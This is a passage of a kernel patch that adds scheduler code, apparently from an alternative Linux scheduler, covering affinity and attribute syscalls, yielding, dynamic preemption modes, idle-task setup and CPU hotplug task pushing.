++	    usize < SCHED_ATTR_SIZE_VER0 || flags)
++		return -EINVAL;
++
++	rcu_read_lock();
++	p = find_process_by_pid(pid);
++	retval = -ESRCH;
++	if (!p)
++		goto out_unlock;
++
++	retval = security_task_getscheduler(p);
++	if (retval)
++		goto out_unlock;
++
++	kattr.sched_policy = p->policy;
++	if (p->sched_reset_on_fork)
++		kattr.sched_flags |= SCHED_FLAG_RESET_ON_FORK;
++	if (task_has_rt_policy(p))
++		kattr.sched_priority = p->rt_priority;
++	else
++		kattr.sched_nice = task_nice(p);
++	kattr.sched_flags &= SCHED_FLAG_ALL;
++
++#ifdef CONFIG_UCLAMP_TASK
++	kattr.sched_util_min = p->uclamp_req[UCLAMP_MIN].value;
++	kattr.sched_util_max = p->uclamp_req[UCLAMP_MAX].value;
++#endif
++
++	rcu_read_unlock();
++
++	return sched_attr_copy_to_user(uattr, &kattr, usize);
++
++out_unlock:
++	rcu_read_unlock();
++	return retval;
++}
++
++#ifdef CONFIG_SMP
++int dl_task_check_affinity(struct task_struct *p, const struct cpumask *mask)
++{
++	return 0;
++}
++#endif
++
++static int
++__sched_setaffinity(struct task_struct *p, struct affinity_context *ctx)
++{
++	int retval;
++	cpumask_var_t cpus_allowed, new_mask;
++
++	if (!alloc_cpumask_var(&cpus_allowed, GFP_KERNEL))
++		return -ENOMEM;
++
++	if (!alloc_cpumask_var(&new_mask, GFP_KERNEL)) {
++		retval = -ENOMEM;
++		goto out_free_cpus_allowed;
++	}
++
++	cpuset_cpus_allowed(p, cpus_allowed);
++	cpumask_and(new_mask, ctx->new_mask, cpus_allowed);
++
++	ctx->new_mask = new_mask;
++	ctx->flags |= SCA_CHECK;
++
++	retval = __set_cpus_allowed_ptr(p, ctx);
++	if (retval)
++		goto out_free_new_mask;
++
++	cpuset_cpus_allowed(p, cpus_allowed);
++	if (!cpumask_subset(new_mask, cpus_allowed)) {
++		/*
++		 * We must have raced with a concurrent cpuset
++		 * update. Just reset the cpus_allowed to the
++		 * cpuset's cpus_allowed
++		 */
++		cpumask_copy(new_mask, cpus_allowed);
++
++		/*
++		 * If SCA_USER is set, a 2nd call to __set_cpus_allowed_ptr()
++		 * will restore the previous user_cpus_ptr value.
++		 *
++		 * In the unlikely event a previous user_cpus_ptr exists,
++		 * we need to further restrict the mask to what is allowed
++		 * by that old user_cpus_ptr.
++		 */
++		if (unlikely((ctx->flags & SCA_USER) && ctx->user_mask)) {
++			bool empty = !cpumask_and(new_mask, new_mask,
++						  ctx->user_mask);
++
++			if (WARN_ON_ONCE(empty))
++				cpumask_copy(new_mask, cpus_allowed);
++		}
++		__set_cpus_allowed_ptr(p, ctx);
++		retval = -EINVAL;
++	}
++
++out_free_new_mask:
++	free_cpumask_var(new_mask);
++out_free_cpus_allowed:
++	free_cpumask_var(cpus_allowed);
++	return retval;
++}
++
++long sched_setaffinity(pid_t pid, const struct cpumask *in_mask)
++{
++	struct affinity_context ac;
++	struct cpumask *user_mask;
++	struct task_struct *p;
++	int retval;
++
++	rcu_read_lock();
++
++	p = find_process_by_pid(pid);
++	if (!p) {
++		rcu_read_unlock();
++		return -ESRCH;
++	}
++
++	/* Prevent p going away */
++	get_task_struct(p);
++	rcu_read_unlock();
++
++	if (p->flags & PF_NO_SETAFFINITY) {
++		retval = -EINVAL;
++		goto out_put_task;
++	}
++
++	if (!check_same_owner(p)) {
++		rcu_read_lock();
++		if (!ns_capable(__task_cred(p)->user_ns, CAP_SYS_NICE)) {
++			rcu_read_unlock();
++			retval = -EPERM;
++			goto out_put_task;
++		}
++		rcu_read_unlock();
++	}
++
++	retval = security_task_setscheduler(p);
++	if (retval)
++		goto out_put_task;
++
++	/*
++	 * With non-SMP configs, user_cpus_ptr/user_mask isn't used and
++	 * alloc_user_cpus_ptr() returns NULL.
++	 */
++	user_mask = alloc_user_cpus_ptr(NUMA_NO_NODE);
++	if (user_mask) {
++		cpumask_copy(user_mask, in_mask);
++	} else if (IS_ENABLED(CONFIG_SMP)) {
++		retval = -ENOMEM;
++		goto out_put_task;
++	}
++
++	ac = (struct affinity_context){
++		.new_mask  = in_mask,
++		.user_mask = user_mask,
++		.flags     = SCA_USER,
++	};
++
++	retval = __sched_setaffinity(p, &ac);
++	kfree(ac.user_mask);
++
++out_put_task:
++	put_task_struct(p);
++	return retval;
++}
++
++static int get_user_cpu_mask(unsigned long __user *user_mask_ptr, unsigned len,
++			     struct cpumask *new_mask)
++{
++	if (len < cpumask_size())
++		cpumask_clear(new_mask);
++	else if (len > cpumask_size())
++		len = cpumask_size();
++
++	return copy_from_user(new_mask, user_mask_ptr, len) ? -EFAULT : 0;
++}
++
++/**
++ * sys_sched_setaffinity - set the CPU affinity of a process
++ * @pid: pid of the process
++ * @len: length in bytes of the bitmask pointed to by user_mask_ptr
++ * @user_mask_ptr: user-space pointer to the new CPU mask
++ *
++ * Return: 0 on success. An error code otherwise.
++ */
++SYSCALL_DEFINE3(sched_setaffinity, pid_t, pid, unsigned int, len,
++		unsigned long __user *, user_mask_ptr)
++{
++	cpumask_var_t new_mask;
++	int retval;
++
++	if (!alloc_cpumask_var(&new_mask, GFP_KERNEL))
++		return -ENOMEM;
++
++	retval = get_user_cpu_mask(user_mask_ptr, len, new_mask);
++	if (retval == 0)
++		retval = sched_setaffinity(pid, new_mask);
++	free_cpumask_var(new_mask);
++	return retval;
++}
++
++long sched_getaffinity(pid_t pid, cpumask_t *mask)
++{
++	struct task_struct *p;
++	raw_spinlock_t *lock;
++	unsigned long flags;
++	int retval;
++
++	rcu_read_lock();
++
++	retval = -ESRCH;
++	p = find_process_by_pid(pid);
++	if (!p)
++		goto out_unlock;
++
++	retval = security_task_getscheduler(p);
++	if (retval)
++		goto out_unlock;
++
++	task_access_lock_irqsave(p, &lock, &flags);
++	cpumask_and(mask, &p->cpus_mask, cpu_active_mask);
++	task_access_unlock_irqrestore(p, lock, &flags);
++
++out_unlock:
++	rcu_read_unlock();
++
++	return retval;
++}
++
++/**
++ * sys_sched_getaffinity - get the CPU affinity of a process
++ * @pid: pid of the process
++ * @len: length in bytes of the bitmask pointed to by user_mask_ptr
++ * @user_mask_ptr: user-space pointer to hold the current CPU mask
++ *
++ * Return: size of CPU mask copied to user_mask_ptr on success. An
++ * error code otherwise.
++ */
++SYSCALL_DEFINE3(sched_getaffinity, pid_t, pid, unsigned int, len,
++		unsigned long __user *, user_mask_ptr)
++{
++	int ret;
++	cpumask_var_t mask;
++
++	if ((len * BITS_PER_BYTE) < nr_cpu_ids)
++		return -EINVAL;
++	if (len & (sizeof(unsigned long)-1))
++		return -EINVAL;
++
++	if (!alloc_cpumask_var(&mask, GFP_KERNEL))
++		return -ENOMEM;
++
++	ret = sched_getaffinity(pid, mask);
++	if (ret == 0) {
++		unsigned int retlen = min_t(size_t, len, cpumask_size());
++
++		if (copy_to_user(user_mask_ptr, mask, retlen))
++			ret = -EFAULT;
++		else
++			ret = retlen;
++	}
++	free_cpumask_var(mask);
++
++	return ret;
++}
++
++static void do_sched_yield(void)
++{
++	struct rq *rq;
++	struct rq_flags rf;
++
++	if (!sched_yield_type)
++		return;
++
++	rq = this_rq_lock_irq(&rf);
++
++	schedstat_inc(rq->yld_count);
++
++	if (1 == sched_yield_type) {
++		if (!rt_task(current))
++			do_sched_yield_type_1(current, rq);
++	} else if (2 == sched_yield_type) {
++		if (rq->nr_running > 1)
++			rq->skip = current;
++	}
++
++	preempt_disable();
++	raw_spin_unlock_irq(&rq->lock);
++	sched_preempt_enable_no_resched();
++
++	schedule();
++}
++
++/**
++ * sys_sched_yield - yield the current processor to other threads.
++ *
++ * This function yields the current CPU to other tasks. If there are no
++ * other threads running on this CPU then this function will return.
++ *
++ * Return: 0.
++ */
++SYSCALL_DEFINE0(sched_yield)
++{
++	do_sched_yield();
++	return 0;
++}
++
++#if !defined(CONFIG_PREEMPTION) || defined(CONFIG_PREEMPT_DYNAMIC)
++int __sched __cond_resched(void)
++{
++	if (should_resched(0)) {
++		preempt_schedule_common();
++		return 1;
++	}
++	/*
++	 * In preemptible kernels, ->rcu_read_lock_nesting tells the tick
++	 * whether the current CPU is in an RCU read-side critical section,
++	 * so the tick can report quiescent states even for CPUs looping
++	 * in kernel context.  In contrast, in non-preemptible kernels,
++	 * RCU readers leave no in-memory hints, which means that CPU-bound
++	 * processes executing in kernel context might never report an
++	 * RCU quiescent state.  Therefore, the following code causes
++	 * cond_resched() to report a quiescent state, but only when RCU
++	 * is in urgent need of one.
++	 */
++#ifndef CONFIG_PREEMPT_RCU
++	rcu_all_qs();
++#endif
++	return 0;
++}
++EXPORT_SYMBOL(__cond_resched);
++#endif
++
++#ifdef CONFIG_PREEMPT_DYNAMIC
++#if defined(CONFIG_HAVE_PREEMPT_DYNAMIC_CALL)
++#define cond_resched_dynamic_enabled	__cond_resched
++#define cond_resched_dynamic_disabled	((void *)&__static_call_return0)
++DEFINE_STATIC_CALL_RET0(cond_resched, __cond_resched);
++EXPORT_STATIC_CALL_TRAMP(cond_resched);
++
++#define might_resched_dynamic_enabled	__cond_resched
++#define might_resched_dynamic_disabled	((void *)&__static_call_return0)
++DEFINE_STATIC_CALL_RET0(might_resched, __cond_resched);
++EXPORT_STATIC_CALL_TRAMP(might_resched);
++#elif defined(CONFIG_HAVE_PREEMPT_DYNAMIC_KEY)
++static DEFINE_STATIC_KEY_FALSE(sk_dynamic_cond_resched);
++int __sched dynamic_cond_resched(void)
++{
++	if (!static_branch_unlikely(&sk_dynamic_cond_resched))
++		return 0;
++	return __cond_resched();
++}
++EXPORT_SYMBOL(dynamic_cond_resched);
++
++static DEFINE_STATIC_KEY_FALSE(sk_dynamic_might_resched);
++int __sched dynamic_might_resched(void)
++{
++	if (!static_branch_unlikely(&sk_dynamic_might_resched))
++		return 0;
++	return __cond_resched();
++}
++EXPORT_SYMBOL(dynamic_might_resched);
++#endif
++#endif
++
++/*
++ * __cond_resched_lock() - if a reschedule is pending, drop the given lock,
++ * call schedule, and on return reacquire the lock.
++ *
++ * This works OK both with and without CONFIG_PREEMPTION.  We do strange low-level
++ * operations here to prevent schedule() from being called twice (once via
++ * spin_unlock(), once by hand).
++ */
++int __cond_resched_lock(spinlock_t *lock)
++{
++	int resched = should_resched(PREEMPT_LOCK_OFFSET);
++	int ret = 0;
++
++	lockdep_assert_held(lock);
++
++	if (spin_needbreak(lock) || resched) {
++		spin_unlock(lock);
++		if (!_cond_resched())
++			cpu_relax();
++		ret = 1;
++		spin_lock(lock);
++	}
++	return ret;
++}
++EXPORT_SYMBOL(__cond_resched_lock);
++
++int __cond_resched_rwlock_read(rwlock_t *lock)
++{
++	int resched = should_resched(PREEMPT_LOCK_OFFSET);
++	int ret = 0;
++
++	lockdep_assert_held_read(lock);
++
++	if (rwlock_needbreak(lock) || resched) {
++		read_unlock(lock);
++		if (!_cond_resched())
++			cpu_relax();
++		ret = 1;
++		read_lock(lock);
++	}
++	return ret;
++}
++EXPORT_SYMBOL(__cond_resched_rwlock_read);
++
++int __cond_resched_rwlock_write(rwlock_t *lock)
++{
++	int resched = should_resched(PREEMPT_LOCK_OFFSET);
++	int ret = 0;
++
++	lockdep_assert_held_write(lock);
++
++	if (rwlock_needbreak(lock) || resched) {
++		write_unlock(lock);
++		if (!_cond_resched())
++			cpu_relax();
++		ret = 1;
++		write_lock(lock);
++	}
++	return ret;
++}
++EXPORT_SYMBOL(__cond_resched_rwlock_write);
++
++#ifdef CONFIG_PREEMPT_DYNAMIC
++
++#ifdef CONFIG_GENERIC_ENTRY
++#include <linux/entry-common.h>
++#endif
++
++/*
++ * SC:cond_resched
++ * SC:might_resched
++ * SC:preempt_schedule
++ * SC:preempt_schedule_notrace
++ * SC:irqentry_exit_cond_resched
++ *
++ *
++ * NONE:
++ *   cond_resched               <- __cond_resched
++ *   might_resched              <- RET0
++ *   preempt_schedule           <- NOP
++ *   preempt_schedule_notrace   <- NOP
++ *   irqentry_exit_cond_resched <- NOP
++ *
++ * VOLUNTARY:
++ *   cond_resched               <- __cond_resched
++ *   might_resched              <- __cond_resched
++ *   preempt_schedule           <- NOP
++ *   preempt_schedule_notrace   <- NOP
++ *   irqentry_exit_cond_resched <- NOP
++ *
++ * FULL:
++ *   cond_resched               <- RET0
++ *   might_resched              <- RET0
++ *   preempt_schedule           <- preempt_schedule
++ *   preempt_schedule_notrace   <- preempt_schedule_notrace
++ *   irqentry_exit_cond_resched <- irqentry_exit_cond_resched
++ */
++
++enum {
++	preempt_dynamic_undefined = -1,
++	preempt_dynamic_none,
++	preempt_dynamic_voluntary,
++	preempt_dynamic_full,
++};
++
++int preempt_dynamic_mode = preempt_dynamic_undefined;
++
++int sched_dynamic_mode(const char *str)
++{
++	if (!strcmp(str, "none"))
++		return preempt_dynamic_none;
++
++	if (!strcmp(str, "voluntary"))
++		return preempt_dynamic_voluntary;
++
++	if (!strcmp(str, "full"))
++		return preempt_dynamic_full;
++
++	return -EINVAL;
++}
++
++#if defined(CONFIG_HAVE_PREEMPT_DYNAMIC_CALL)
++#define preempt_dynamic_enable(f)	static_call_update(f, f##_dynamic_enabled)
++#define preempt_dynamic_disable(f)	static_call_update(f, f##_dynamic_disabled)
++#elif defined(CONFIG_HAVE_PREEMPT_DYNAMIC_KEY)
++#define preempt_dynamic_enable(f)	static_key_enable(&sk_dynamic_##f.key)
++#define preempt_dynamic_disable(f)	static_key_disable(&sk_dynamic_##f.key)
++#else
++#error "Unsupported PREEMPT_DYNAMIC mechanism"
++#endif
++
++void sched_dynamic_update(int mode)
++{
++	/*
++	 * Avoid {NONE,VOLUNTARY} -> FULL transitions from ever ending up in
++	 * the ZERO state, which is invalid.
++	 */
++	preempt_dynamic_enable(cond_resched);
++	preempt_dynamic_enable(might_resched);
++	preempt_dynamic_enable(preempt_schedule);
++	preempt_dynamic_enable(preempt_schedule_notrace);
++	preempt_dynamic_enable(irqentry_exit_cond_resched);
++
++	switch (mode) {
++	case preempt_dynamic_none:
++		preempt_dynamic_enable(cond_resched);
++		preempt_dynamic_disable(might_resched);
++		preempt_dynamic_disable(preempt_schedule);
++		preempt_dynamic_disable(preempt_schedule_notrace);
++		preempt_dynamic_disable(irqentry_exit_cond_resched);
++		pr_info("Dynamic Preempt: none\n");
++		break;
++
++	case preempt_dynamic_voluntary:
++		preempt_dynamic_enable(cond_resched);
++		preempt_dynamic_enable(might_resched);
++		preempt_dynamic_disable(preempt_schedule);
++		preempt_dynamic_disable(preempt_schedule_notrace);
++		preempt_dynamic_disable(irqentry_exit_cond_resched);
++		pr_info("Dynamic Preempt: voluntary\n");
++		break;
++
++	case preempt_dynamic_full:
++		preempt_dynamic_disable(cond_resched);
++		preempt_dynamic_disable(might_resched);
++		preempt_dynamic_enable(preempt_schedule);
++		preempt_dynamic_enable(preempt_schedule_notrace);
++		preempt_dynamic_enable(irqentry_exit_cond_resched);
++		pr_info("Dynamic Preempt: full\n");
++		break;
++	}
++
++	preempt_dynamic_mode = mode;
++}
++
++static int __init setup_preempt_mode(char *str)
++{
++	int mode = sched_dynamic_mode(str);
++	if (mode < 0) {
++		pr_warn("Dynamic Preempt: unsupported mode: %s\n", str);
++		return 0;
++	}
++
++	sched_dynamic_update(mode);
++	return 1;
++}
++__setup("preempt=", setup_preempt_mode);
++
++static void __init preempt_dynamic_init(void)
++{
++	if (preempt_dynamic_mode == preempt_dynamic_undefined) {
++		if (IS_ENABLED(CONFIG_PREEMPT_NONE)) {
++			sched_dynamic_update(preempt_dynamic_none);
++		} else if (IS_ENABLED(CONFIG_PREEMPT_VOLUNTARY)) {
++			sched_dynamic_update(preempt_dynamic_voluntary);
++		} else {
++			/* Default static call setting, nothing to do */
++			WARN_ON_ONCE(!IS_ENABLED(CONFIG_PREEMPT));
++			preempt_dynamic_mode = preempt_dynamic_full;
++			pr_info("Dynamic Preempt: full\n");
++		}
++	}
++}
++
++#define PREEMPT_MODEL_ACCESSOR(mode) \
++	bool preempt_model_##mode(void)						 \
++	{									 \
++		WARN_ON_ONCE(preempt_dynamic_mode == preempt_dynamic_undefined); \
++		return preempt_dynamic_mode == preempt_dynamic_##mode;		 \
++	}									 \
++	EXPORT_SYMBOL_GPL(preempt_model_##mode)
++
++PREEMPT_MODEL_ACCESSOR(none);
++PREEMPT_MODEL_ACCESSOR(voluntary);
++PREEMPT_MODEL_ACCESSOR(full);
++
++#else /* !CONFIG_PREEMPT_DYNAMIC */
++
++static inline void preempt_dynamic_init(void) { }
++
++#endif /* #ifdef CONFIG_PREEMPT_DYNAMIC */
++
++/**
++ * yield - yield the current processor to other threads.
++ *
++ * Do not ever use this function, there's a 99% chance you're doing it wrong.
++ *
++ * The scheduler is at all times free to pick the calling task as the most
++ * eligible task to run, if removing the yield() call from your code breaks
++ * it, it's already broken.
++ *
++ * Typical broken usage is:
++ *
++ * while (!event)
++ * 	yield();
++ *
++ * where one assumes that yield() will let 'the other' process run that will
++ * make event true. If the current task is a SCHED_FIFO task that will never
++ * happen. Never use yield() as a progress guarantee!!
++ *
++ * If you want to use yield() to wait for something, use wait_event().
++ * If you want to use yield() to be 'nice' for others, use cond_resched().
++ * If you still want to use yield(), do not!
++ */
++void __sched yield(void)
++{
++	set_current_state(TASK_RUNNING);
++	do_sched_yield();
++}
++EXPORT_SYMBOL(yield);
++
++/**
++ * yield_to - yield the current processor to another thread in
++ * your thread group, or accelerate that thread toward the
++ * processor it's on.
++ * @p: target task
++ * @preempt: whether task preemption is allowed or not
++ *
++ * It's the caller's job to ensure that the target task struct
++ * can't go away on us before we can do any checks.
++ *
++ * In Alt schedule FW, yield_to is not supported.
++ *
++ * Return:
++ *	true (>0) if we indeed boosted the target task.
++ *	false (0) if we failed to boost the target.
++ *	-ESRCH if there's no task to yield to.
++ */
++int __sched yield_to(struct task_struct *p, bool preempt)
++{
++	return 0;
++}
++EXPORT_SYMBOL_GPL(yield_to);
++
++int io_schedule_prepare(void)
++{
++	int old_iowait = current->in_iowait;
++
++	current->in_iowait = 1;
++	blk_flush_plug(current->plug, true);
++	return old_iowait;
++}
++
++void io_schedule_finish(int token)
++{
++	current->in_iowait = token;
++}
++
++/*
++ * This task is about to go to sleep on IO.  Increment rq->nr_iowait so
++ * that process accounting knows that this is a task in IO wait state.
++ *
++ * But don't do that if it is a deliberate, throttling IO wait (this task
++ * has set its backing_dev_info: the queue against which it should throttle)
++ */
++
++long __sched io_schedule_timeout(long timeout)
++{
++	int token;
++	long ret;
++
++	token = io_schedule_prepare();
++	ret = schedule_timeout(timeout);
++	io_schedule_finish(token);
++
++	return ret;
++}
++EXPORT_SYMBOL(io_schedule_timeout);
++
++void __sched io_schedule(void)
++{
++	int token;
++
++	token = io_schedule_prepare();
++	schedule();
++	io_schedule_finish(token);
++}
++EXPORT_SYMBOL(io_schedule);
++
++/**
++ * sys_sched_get_priority_max - return maximum RT priority.
++ * @policy: scheduling class.
++ *
++ * Return: On success, this syscall returns the maximum
++ * rt_priority that can be used by a given scheduling class.
++ * On failure, a negative error code is returned.
++ */
++SYSCALL_DEFINE1(sched_get_priority_max, int, policy)
++{
++	int ret = -EINVAL;
++
++	switch (policy) {
++	case SCHED_FIFO:
++	case SCHED_RR:
++		ret = MAX_RT_PRIO - 1;
++		break;
++	case SCHED_NORMAL:
++	case SCHED_BATCH:
++	case SCHED_IDLE:
++		ret = 0;
++		break;
++	}
++	return ret;
++}
++
++/**
++ * sys_sched_get_priority_min - return minimum RT priority.
++ * @policy: scheduling class.
++ *
++ * Return: On success, this syscall returns the minimum
++ * rt_priority that can be used by a given scheduling class.
++ * On failure, a negative error code is returned.
++ */
++SYSCALL_DEFINE1(sched_get_priority_min, int, policy)
++{
++	int ret = -EINVAL;
++
++	switch (policy) {
++	case SCHED_FIFO:
++	case SCHED_RR:
++		ret = 1;
++		break;
++	case SCHED_NORMAL:
++	case SCHED_BATCH:
++	case SCHED_IDLE:
++		ret = 0;
++		break;
++	}
++	return ret;
++}
++
++static int sched_rr_get_interval(pid_t pid, struct timespec64 *t)
++{
++	struct task_struct *p;
++	int retval;
++
++	alt_sched_debug();
++
++	if (pid < 0)
++		return -EINVAL;
++
++	retval = -ESRCH;
++	rcu_read_lock();
++	p = find_process_by_pid(pid);
++	if (!p)
++		goto out_unlock;
++
++	retval = security_task_getscheduler(p);
++	if (retval)
++		goto out_unlock;
++	rcu_read_unlock();
++
++	*t = ns_to_timespec64(sched_timeslice_ns);
++	return 0;
++
++out_unlock:
++	rcu_read_unlock();
++	return retval;
++}
++
++/**
++ * sys_sched_rr_get_interval - return the default timeslice of a process.
++ * @pid: pid of the process.
++ * @interval: userspace pointer to the timeslice value.
++ *
++ *
++ * Return: On success, 0 and the timeslice is in @interval. Otherwise,
++ * an error code.
++ */
++SYSCALL_DEFINE2(sched_rr_get_interval, pid_t, pid,
++		struct __kernel_timespec __user *, interval)
++{
++	struct timespec64 t;
++	int retval = sched_rr_get_interval(pid, &t);
++
++	if (retval == 0)
++		retval = put_timespec64(&t, interval);
++
++	return retval;
++}
++
++#ifdef CONFIG_COMPAT_32BIT_TIME
++SYSCALL_DEFINE2(sched_rr_get_interval_time32, pid_t, pid,
++		struct old_timespec32 __user *, interval)
++{
++	struct timespec64 t;
++	int retval = sched_rr_get_interval(pid, &t);
++
++	if (retval == 0)
++		retval = put_old_timespec32(&t, interval);
++	return retval;
++}
++#endif
++
++void sched_show_task(struct task_struct *p)
++{
++	unsigned long free = 0;
++	int ppid;
++
++	if (!try_get_task_stack(p))
++		return;
++
++	pr_info("task:%-15.15s state:%c", p->comm, task_state_to_char(p));
++
++	if (task_is_running(p))
++		pr_cont("  running task    ");
++#ifdef CONFIG_DEBUG_STACK_USAGE
++	free = stack_not_used(p);
++#endif
++	ppid = 0;
++	rcu_read_lock();
++	if (pid_alive(p))
++		ppid = task_pid_nr(rcu_dereference(p->real_parent));
++	rcu_read_unlock();
++	pr_cont(" stack:%-5lu pid:%-5d ppid:%-6d flags:0x%08lx\n",
++		free, task_pid_nr(p), ppid,
++		read_task_thread_flags(p));
++
++	print_worker_info(KERN_INFO, p);
++	print_stop_info(KERN_INFO, p);
++	show_stack(p, NULL, KERN_INFO);
++	put_task_stack(p);
++}
++EXPORT_SYMBOL_GPL(sched_show_task);
++
++static inline bool
++state_filter_match(unsigned long state_filter, struct task_struct *p)
++{
++	unsigned int state = READ_ONCE(p->__state);
++
++	/* no filter, everything matches */
++	if (!state_filter)
++		return true;
++
++	/* filter, but doesn't match */
++	if (!(state & state_filter))
++		return false;
++
++	/*
++	 * When looking for TASK_UNINTERRUPTIBLE skip TASK_IDLE (allows
++	 * TASK_KILLABLE).
++	 */
++	if (state_filter == TASK_UNINTERRUPTIBLE && (state & TASK_NOLOAD))
++		return false;
++
++	return true;
++}
++
++
++void show_state_filter(unsigned int state_filter)
++{
++	struct task_struct *g, *p;
++
++	rcu_read_lock();
++	for_each_process_thread(g, p) {
++		/*
++		 * reset the NMI-timeout, listing all files on a slow
++		 * console might take a lot of time:
++		 * Also, reset softlockup watchdogs on all CPUs, because
++		 * another CPU might be blocked waiting for us to process
++		 * an IPI.
++		 */
++		touch_nmi_watchdog();
++		touch_all_softlockup_watchdogs();
++		if (state_filter_match(state_filter, p))
++			sched_show_task(p);
++	}
++
++#ifdef CONFIG_SCHED_DEBUG
++	/* TODO: Alt schedule FW should support this
++	if (!state_filter)
++		sysrq_sched_debug_show();
++	*/
++#endif
++	rcu_read_unlock();
++	/*
++	 * Only show locks if all tasks are dumped:
++	 */
++	if (!state_filter)
++		debug_show_all_locks();
++}
++
++void dump_cpu_task(int cpu)
++{
++	if (cpu == smp_processor_id() && in_hardirq()) {
++		struct pt_regs *regs;
++
++		regs = get_irq_regs();
++		if (regs) {
++			show_regs(regs);
++			return;
++		}
++	}
++
++	if (trigger_single_cpu_backtrace(cpu))
++		return;
++
++	pr_info("Task dump for CPU %d:\n", cpu);
++	sched_show_task(cpu_curr(cpu));
++}
++
++/**
++ * init_idle - set up an idle thread for a given CPU
++ * @idle: task in question
++ * @cpu: CPU the idle task belongs to
++ *
++ * NOTE: this function does not set the idle thread's NEED_RESCHED
++ * flag, to make booting more robust.
++ */
++void __init init_idle(struct task_struct *idle, int cpu)
++{
++#ifdef CONFIG_SMP
++	struct affinity_context ac = (struct affinity_context) {
++		.new_mask  = cpumask_of(cpu),
++		.flags     = 0,
++	};
++#endif
++	struct rq *rq = cpu_rq(cpu);
++	unsigned long flags;
++
++	__sched_fork(0, idle);
++
++	raw_spin_lock_irqsave(&idle->pi_lock, flags);
++	raw_spin_lock(&rq->lock);
++
++	idle->last_ran = rq->clock_task;
++	idle->__state = TASK_RUNNING;
++	/*
++	 * PF_KTHREAD should already be set at this point; regardless, make it
++	 * look like a proper per-CPU kthread.
++	 */
++	idle->flags |= PF_IDLE | PF_KTHREAD | PF_NO_SETAFFINITY;
++	kthread_set_per_cpu(idle, cpu);
++
++	sched_queue_init_idle(&rq->queue, idle);
++
++#ifdef CONFIG_SMP
++	/*
++	 * It's possible that init_idle() gets called multiple times on a task,
++	 * in that case do_set_cpus_allowed() will not do the right thing.
++	 *
++	 * And since this is boot we can forgo the serialisation.
++	 */
++	set_cpus_allowed_common(idle, &ac);
++#endif
++
++	/* Silence PROVE_RCU */
++	rcu_read_lock();
++	__set_task_cpu(idle, cpu);
++	rcu_read_unlock();
++
++	rq->idle = idle;
++	rcu_assign_pointer(rq->curr, idle);
++	idle->on_cpu = 1;
++
++	raw_spin_unlock(&rq->lock);
++	raw_spin_unlock_irqrestore(&idle->pi_lock, flags);
++
++	/* Set the preempt count _outside_ the spinlocks! */
++	init_idle_preempt_count(idle, cpu);
++
++	ftrace_graph_init_idle_task(idle, cpu);
++	vtime_init_idle(idle, cpu);
++#ifdef CONFIG_SMP
++	sprintf(idle->comm, "%s/%d", INIT_TASK_COMM, cpu);
++#endif
++}
++
++#ifdef CONFIG_SMP
++
++int cpuset_cpumask_can_shrink(const struct cpumask __maybe_unused *cur,
++			      const struct cpumask __maybe_unused *trial)
++{
++	return 1;
++}
++
++int task_can_attach(struct task_struct *p,
++		    const struct cpumask *cs_effective_cpus)
++{
++	int ret = 0;
++
++	/*
++	 * Kthreads which disallow setaffinity shouldn't be moved
++	 * to a new cpuset; we don't want to change their CPU
++	 * affinity and isolating such threads by their set of
++	 * allowed nodes is unnecessary.  Thus, cpusets are not
++	 * applicable for such threads.  This prevents checking for
++	 * success of set_cpus_allowed_ptr() on all attached tasks
++	 * before cpus_mask may be changed.
++	 */
++	if (p->flags & PF_NO_SETAFFINITY)
++		ret = -EINVAL;
++
++	return ret;
++}
++
++bool sched_smp_initialized __read_mostly;
++
++#ifdef CONFIG_HOTPLUG_CPU
++/*
++ * Ensures that the idle task is using init_mm right before its CPU goes
++ * offline.
++ */
++void idle_task_exit(void)
++{
++	struct mm_struct *mm = current->active_mm;
++
++	BUG_ON(current != this_rq()->idle);
++
++	if (mm != &init_mm) {
++		switch_mm(mm, &init_mm, current);
++		finish_arch_post_lock_switch();
++	}
++
++	/* finish_cpu(), as ran on the BP, will clean up the active_mm state */
++}
++
++static int __balance_push_cpu_stop(void *arg)
++{
++	struct task_struct *p = arg;
++	struct rq *rq = this_rq();
++	struct rq_flags rf;
++	int cpu;
++
++	raw_spin_lock_irq(&p->pi_lock);
++	rq_lock(rq, &rf);
++
++	update_rq_clock(rq);
++
++	if (task_rq(p) == rq && task_on_rq_queued(p)) {
++		cpu = select_fallback_rq(rq->cpu, p);
++		rq = __migrate_task(rq, p, cpu);
++	}
++
++	rq_unlock(rq, &rf);
++	raw_spin_unlock_irq(&p->pi_lock);
++
++	put_task_struct(p);
++
++	return 0;
++}
++
++static DEFINE_PER_CPU(struct cpu_stop_work, push_work);
++
++/*
++ * This is enabled below SCHED_AP_ACTIVE; when !cpu_active(), but only
++ * effective when the hotplug motion is down.
++ */
++static void balance_push(struct rq *rq)
++{
++	struct task_struct *push_task = rq->curr;
++
++	lockdep_assert_held(&rq->lock);
++
++	/*
++	 * Ensure the thing is persistent until balance_push_set(.on = false);
++	 */
++	rq->balance_callback = &balance_push_callback;
++
++	/*
++	 * Only active while going offline and when invoked on the outgoing
++	 * CPU.
++	 */
++	if (!cpu_dying(rq->cpu) || rq != this_rq())
++		return;
++
++	/*
++	 * Both the cpu-hotplug and stop task are in this case and are
++	 * required to complete the hotplug process.
++	 */
++	if (kthread_is_per_cpu(push_task) ||
++	    is_migration_disabled(push_task)) {
++
++		/*
++		 * If this is the idle task on the outgoing CPU try to wake
++		 * up the hotplug control thread which might wait for the
++		 * last task to vanish. The rcuwait_active() check is
++		 * accurate here because the waiter is pinned on this CPU
++		 * and can't obviously be running in parallel.
++		 *
++		 * On RT kernels this also has to check whether there are
++		 * pinned and scheduled out tasks on the runqueue. They
++		 * need to leave the migrate disabled section first.
++		 */
++		if (!rq->nr_running && !rq_has_pinned_tasks(rq) &&
++		    rcuwait_active(&rq->hotplug_wait)) {
++			raw_spin_unlock(&rq->lock);
++			rcuwait_wake_up(&rq->hotplug_wait);
++			raw_spin_lock(&rq->lock);
++		}
++		return;
++	}
++
++	get_task_struct(push_task);
++	/*
++	 * Temporarily drop rq->lock such that we can wake-up the stop task.
++	 * Both preemption and IRQs are still disabled.
++	 */
++	raw_spin_unlock(&rq->lock);
++	stop_one_cpu_nowait(rq->cpu, __balance_push_cpu_stop, push_task,
++			    this_cpu_ptr(&push_work));
++	/*
++	 * At this point need_resched() is true and we'll take the loop in
++	 * schedule(). The next pick is obviously going to be the stop task
++	 * which kthread_is_per_cpu() and will push this task away.
++	 */
++	raw_spin_lock(&rq->lock);
++}
++
++static void balance_push_set(int cpu, bool on)
++{
++	struct rq *rq = cpu_rq(cpu);
++	struct rq_flags rf;
++
++	rq_lock_irqsave(rq, &rf);
++	if (on) {
